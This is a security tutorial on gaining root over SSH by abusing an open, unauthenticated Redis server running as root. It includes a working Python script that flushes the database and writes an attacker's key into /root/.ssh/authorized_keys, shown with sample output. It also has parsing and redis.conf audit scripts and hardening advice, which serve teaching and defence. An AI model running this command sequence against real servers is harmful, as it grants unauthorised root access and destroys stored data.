
Obtaining root shell on redis server

🎃 kr0m

As we saw on a previous occasion, a misconfigured redis server lets an attacker upload webshells. This time we detail how the root account itself can be compromised when the service is started as the wrong user and access to its port is not filtered by a firewall.

By default, a redis installation starts the service as the redis user; this time we start it as root so that the impact of the attack is obvious. The technique writes files wherever the service user can write, so the user only decides how bad the outcome is.

We start the service by running the binary as root with the config file as its argument:

redis-server redis.conf

On the attacker's side, we install the redis library for python (easy_install is long deprecated; pip install redis is the current equivalent):

easy_install redis

We write the list of targets, one IP per line, in this case only localhost:

vi list

127.0.0.1

We download the hackredis.py script:

We launch the attack, indicating the public key to insert. Be careful: the python script flushes the redis database before writing the dump, so any data held by the target instance is destroyed:

$ python2.7 hackredis.py -l list -p 6379 -r .ssh/id_rsa.pub -sp 22 -pk .ssh/id_rsa

[*] Attacking ip:127.0.0.1
[*] Check connecting...
[+] Success !
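What the script does under the hood is a handful of unauthenticated Redis commands: point the dump directory at the target's .ssh, set the dump filename to authorized_keys, store the public key as a value and SAVE. The following is an added example of that exchange (my code, not hackredis.py and not the python redis library): it hand-encodes the RESP wire protocol so you can see that nothing in the sequence asks for a password. The host, port, key name and /root/.ssh are assumptions that match the article's setup; FakeRedis is a constructed stand-in so the block also runs with no server, and answers with the error a hardened server gives once CONFIG has been renamed away.

```python
import socket
import sys

# Assumptions (not from the article): an open Redis on TARGET_HOST:TARGET_PORT
# with no requirepass and CONFIG not renamed, running as root so that its
# SAVE lands in /root/.ssh.
TARGET_HOST = "127.0.0.1"
TARGET_PORT = 6379
SSH_DIR = "/root/.ssh"
KEY_NAME = "crackit"  # the key name visible in the article's dump


def resp_encode(args):
    """Encode one command as a RESP array of bulk strings: the wire format
    every Redis client (redis-cli, the python library) uses."""
    out = [b"*%d\r\n" % len(args)]
    for arg in args:
        if isinstance(arg, str):
            arg = arg.encode()
        out.append(b"$%d\r\n%s\r\n" % (len(arg), arg))
    return b"".join(out)


def resp_decode_line(data):
    """Decode the one-line replies this exchange produces: +OK, -ERR ..., :n."""
    body = data[1:].rstrip(b"\r\n").decode(errors="replace")
    if data.startswith(b"+"):
        return ("ok", body)
    if data.startswith(b"-"):
        return ("err", body)
    if data.startswith(b":"):
        return ("int", int(body))
    return ("raw", data)


def attack_commands(pubkey, ssh_dir=SSH_DIR, key_name=KEY_NAME):
    """The command sequence that turns an unauthenticated Redis into a file
    writer. The newlines around the key put it on a line of its own inside
    the RDB binary, which is what lets sshd pick it out later."""
    return [
        ("FLUSHALL",),                                    # destructive: empties the instance
        ("CONFIG", "SET", "dir", ssh_dir),                # where the next SAVE writes
        ("CONFIG", "SET", "dbfilename", "authorized_keys"),
        ("SET", key_name, "\n\n" + pubkey.strip() + "\n\n"),
        ("SAVE",),                                        # dump to <dir>/<dbfilename>
    ]


def run_attack(sock, pubkey):
    """Send the commands one by one and stop at the first error reply.
    Returns (command name, decoded reply) pairs as a transcript."""
    transcript = []
    for cmd in attack_commands(pubkey):
        sock.sendall(resp_encode(cmd))
        reply = resp_decode_line(sock.recv(4096))
        transcript.append((cmd[0], reply))
        if reply[0] == "err":
            break
    return transcript


class FakeRedis:
    """Constructed stand-in for the server so the block runs offline. It
    answers +OK to everything unless CONFIG has been renamed away (the usual
    mitigation), in which case CONFIG gets the error a real server sends."""

    def __init__(self, config_renamed=False):
        self.config_renamed = config_renamed
        self.sent = []

    def sendall(self, data):
        self.sent.append(data)

    def recv(self, _n):
        if self.config_renamed and self.sent[-1].startswith(b"*4\r\n$6\r\nCONFIG\r\n"):
            return b"-ERR unknown command 'CONFIG'\r\n"
        return b"+OK\r\n"


if __name__ == "__main__":
    # Usage: python3 open_redis_authorized_keys.py ~/.ssh/id_rsa.pub [host]
    key = open(sys.argv[1]).read()
    host = sys.argv[2] if len(sys.argv) > 2 else TARGET_HOST
    with socket.create_connection((host, TARGET_PORT), timeout=5) as s:
        for name, reply in run_attack(s, key):
            print(f"{name:<9} -> {reply[0]} {reply[1]}")
```

The transcript returned by run_attack is the whole story: five requests, five +OK replies, no handshake. The same sequence against an instance with rename-command CONFIG "" stops at the second step, which is why that single line of config is worth having even when the port is supposed to be firewalled.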

We connect to the server and voilà, we are root:

ssh localhost -p22

#

If we check the contents of authorized_keys, it is not a plain key file but a Redis RDB dump: the REDIS0006 header, the key name crackit, our public key on a line of its own, and binary trailer bytes. sshd reads authorized_keys line by line and ignores any line it cannot parse as a key, which is why the junk around the key does no harm:

cat authorized_keys

REDIS0006þcrackitA
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDVQnniSdSbjmAtjMfLpj5hjTRz8Xr/5pn7G43cznRXSQ3zCG6QvEqNEOxVkMfvDx+esIaINrecyD388l9gctqrXb13kE7JxQZnXW6rnJcCG96r006nR1sz7bXrj0OGRBIag53MK4fX1MhkJi6bsV4JiOEBB5bnnDvD1YuuO6zEPIl58w4h21JI7R78Zg9nWwAyNBgJsaCq4kyt1g4GpRtil00V0GERMfyKaS3CcjvSHMQKNR8INzW+BCo8KIZCUXdgl7h4qjo0064/1tCWNo6Yv1gtnjxK3nWo6AaC9Cno58RCb0FuRg+GS5LGQuKRXH8NdTYl4KG4usrtfSbO6pCf kr0m@skynet

ÿ¸æÜòWzp
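To make that line-by-line tolerance concrete, here is an added example (my code, a simplified imitation of the filter sshd applies, not OpenSSH's own) that scans file bytes the way the server does and reports which lines would be accepted as keys. SAMPLE_DUMP is constructed: it is only shaped like the dumped file above, the key blob is truncated, and it is not a valid RDB file.

```python
import base64
import binascii

KEY_TYPES = {"ssh-rsa", "ssh-dss", "ssh-ed25519",
             "ecdsa-sha2-nistp256", "ecdsa-sha2-nistp384", "ecdsa-sha2-nistp521"}

# Constructed stand-in for the dumped authorized_keys: a REDIS0006-style
# header, the key name, the public key wrapped in newlines, one bogus line,
# and trailer junk. Only the shape matches the article's file.
SAMPLE_DUMP = (
    b"REDIS0006\xfe\x00\x00\x07crackit\x41"
    b"\n\nssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAAAgQC7 kr0m@skynet\n\n"
    b"ssh-rsa not-base64!!! bogus\n"
    b"\xff\xb8\xe6\xdc\xf2Wzp"
)


def looks_like_key(line):
    """'type base64 [comment]' where the base64 decodes and its first
    length-prefixed string is the type, as in every OpenSSH public key blob.
    Option-prefixed lines (command="...", from="...") are not handled here."""
    parts = line.split()
    if len(parts) < 2 or parts[0] not in KEY_TYPES:
        return False
    try:
        blob = base64.b64decode(parts[1], validate=True)
    except (binascii.Error, ValueError):
        return False
    key_type = parts[0].encode()
    return blob.startswith(len(key_type).to_bytes(4, "big") + key_type)


def usable_keys(data):
    """Scan file bytes the way sshd scans authorized_keys: line by line,
    skipping blanks, comments and anything that does not parse as a key.
    Undecodable bytes are replaced rather than aborting the scan."""
    text = data.decode("utf-8", errors="replace")
    keys = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        if looks_like_key(line):
            keys.append(line)
    return keys


if __name__ == "__main__":
    for key in usable_keys(SAMPLE_DUMP):
        print("accepted:", key)
```

Of the five lines in the constructed dump only the real key survives; the header, the trailer and the malformed ssh-rsa line are all dropped. This is the property the attack depends on, and also why a quick `cat authorized_keys` that shows garbage should not be dismissed as corruption.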

This is how dangerous it can be to start services with the wrong user. Combined with a port that is not filtered in any way and a server that accepts CONFIG SET from anyone who connects, it leads to a nice root shell. Running redis as an unprivileged user limits the damage, but the exposure itself is the open, unauthenticated port: bind to localhost or firewall it, set requirepass, and rename or disable CONFIG.
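The run-as user lives in the init script or systemd unit, but the rest of the exposure is visible in redis.conf. The following is an added example (my code, not from the article) that audits a config for the conditions the attack above relies on, with a constructed weak config beside a hardened one. The directive names are real Redis ones; protected-mode exists from Redis 3.2 onward, so the server in the article (RDB version 6, a 2.x release) would not have had it.

```python
# Constructed: roughly the redis.conf the article's server would have run
# with. Nothing here stops a remote client from rewriting the config.
WEAK_CONF = """\
port 6379
bind 0.0.0.0
daemonize yes
dir /var/lib/redis
"""

# Constructed: the same server with the knobs that break the technique.
# rename-command to "" removes a command entirely. Running as an
# unprivileged user is set in the init script or unit (User=redis), not here.
HARDENED_CONF = """\
port 6379
bind 127.0.0.1
protected-mode yes
requirepass replace-with-a-long-random-secret
rename-command CONFIG ""
rename-command FLUSHALL ""
dir /var/lib/redis
"""

ALL_INTERFACES = {"0.0.0.0", "::", "*"}


def parse_conf(text):
    """redis.conf is 'directive arg arg ...' per line; '#' starts a comment."""
    directives = []
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            name, *args = line.split()
            directives.append((name.lower(), args))
    return directives


def audit(text):
    """Return one finding per condition that would let the article's attack
    through; an empty list means none of the known-bad settings is present."""
    directives = parse_conf(text)

    def values(name):
        return [args for n, args in directives if n == name]

    findings = []
    binds = values("bind")
    if not binds or any(a in ALL_INTERFACES for args in binds for a in args):
        findings.append("bind: no bind line or wildcard; listens on every interface")
    if not values("requirepass"):
        findings.append("requirepass: unset; anyone who reaches the port is a client")
    protected = values("protected-mode")
    if protected and protected[-1] and protected[-1][0].lower() == "no":
        findings.append("protected-mode: explicitly disabled")
    renamed = {args[0].upper() for args in values("rename-command") if args}
    for cmd in ("CONFIG", "FLUSHALL"):
        if cmd not in renamed:
            findings.append(f"rename-command: {cmd} still reachable by clients")
    return findings


if __name__ == "__main__":
    import sys
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else WEAK_CONF
    for finding in audit(text) or ["no findings"]:
        print(finding)
```

Run it against a real config with `python3 audit_redis_conf.py /etc/redis/redis.conf`. The checks are deliberately narrow: they cover the four things that made this particular attack possible and nothing else, and a clean result still leaves the question of which user the process runs as.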
